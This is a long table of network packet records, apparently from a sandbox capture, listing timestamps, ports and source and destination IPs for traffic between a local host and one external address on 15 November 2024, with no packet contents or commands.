Nov 15, 2024 10:29:30.250766993 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250777006 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250786066 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250794888 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250823021 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250833988 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250844002 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250844002 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250853062 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250863075 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250884056 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250889063 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250894070 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250904083 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250914097 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250927925 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250930071 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250941038 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250941992 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250973940 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250987053 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251003027 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251013041 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251020908 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251032114 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251060009 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251060009 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251070023 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251076937 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251115084 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251121044 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251131058 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251161098 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251171112 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251177073 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251216888 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251247883 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251257896 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251293898 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251338005 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251349926 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251358986 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251404047 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251410007 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251414061 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251432896 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251446009 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251455069 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251478910 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251496077 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251501083 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251547098 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251584053 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251616955 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251626968 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251667976 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251677036 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251687050 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251738071 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251818895 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251830101 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251840115 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251851082 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251871109 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251880884 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251884937 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251898050 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251905918 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251908064 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251925945 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251933098 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251935959 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251951933 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251966000 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251975060 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.251977921 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.251993895 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252003908 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252042055 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252055883 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252073050 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252083063 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252087116 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252090931 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252094984 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252161026 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252166986 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252171040 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252180099 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252188921 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252207994 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252213955 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252217054 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252227068 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252250910 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252258062 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252260923 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252289057 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252304077 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252312899 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252315044 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252363920 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252367020 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252372980 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252382040 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252392054 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252424002 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252439022 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252463102 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252491951 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252496958 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252507925 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252516985 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252526045 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252530098 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252547979 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252554893 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252557039 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252568007 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252578020 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252583981 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252599001 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252603054 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252613068 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252625942 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252638102 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252648115 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252665043 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252667904 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252703905 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252708912 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252720118 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252727985 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252741098 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252747059 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252757072 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252774954 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252784014 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252785921 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252811909 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252819061 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252821922 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252851009 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252865076 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252875090 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252876997 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252882957 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252897978 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252934933 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.252958059 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.252970934 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.253037930 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.253070116 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.253079891 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.253133059 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255225897 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255237103 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255280972 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255289078 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255299091 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255342007 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255346060 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255352020 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255393028 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255404949 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255414963 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255446911 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255456924 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255465031 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255475044 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255487919 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255510092 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255542994 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255584002 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255594969 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255604029 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255613089 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255631924 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255640030 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255640984 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255659103 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255667925 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255671024 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255686045 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255696058 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255698919 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255707979 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255729914 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255733013 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255759954 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255780935 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255791903 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255816936 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255851030 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255855083 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255865097 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255882978 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255892038 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255904913 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255914927 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255918980 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255947113 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.255953074 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.255960941 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256000042 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256009102 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256009102 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256036043 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256047010 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256057978 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256071091 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256079912 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256093025 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256114006 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256124020 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256143093 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256144047 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256153107 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256171942 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256181955 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256181955 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256207943 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256221056 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256222010 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256237984 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256246090 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256256104 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256268978 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256316900 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256417036 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256427050 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256436110 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256444931 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256455898 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256464958 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256474018 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256475925 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256484032 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256500006 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256505966 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256515980 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256526947 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256527901 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256536007 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256553888 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256553888 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256562948 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256570101 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256572962 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256582975 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256592989 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256603003 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256612062 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256620884 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256628036 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256629944 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256642103 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256659031 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256661892 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256671906 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256671906 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256680965 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256696939 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256700993 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256711006 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256717920 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256727934 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256736994 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256750107 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256752968 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256761074 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256787062 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256797075 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256802082 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256807089 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256822109 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256858110 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256875992 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256886005 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256895065 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256906986 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256918907 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256918907 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256933928 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256937027 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256947041 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256952047 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256975889 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.256982088 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.256984949 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257014036 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257050037 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257090092 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257108927 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257118940 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257128000 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257145882 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257154942 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257167101 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257167101 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257188082 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257209063 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257242918 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257245064 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257255077 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257294893 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257294893 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257304907 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257333994 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257344007 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257348061 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257384062 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257399082 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257404089 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257435083 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257451057 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257467031 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257491112 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257517099 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257523060 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257531881 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257540941 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257550955 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257579088 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257579088 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257589102 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257599115 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257627010 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257637024 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257646084 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257651091 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257674932 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257684946 CET	15666	49927	45.130.145.152	192.168.2.10
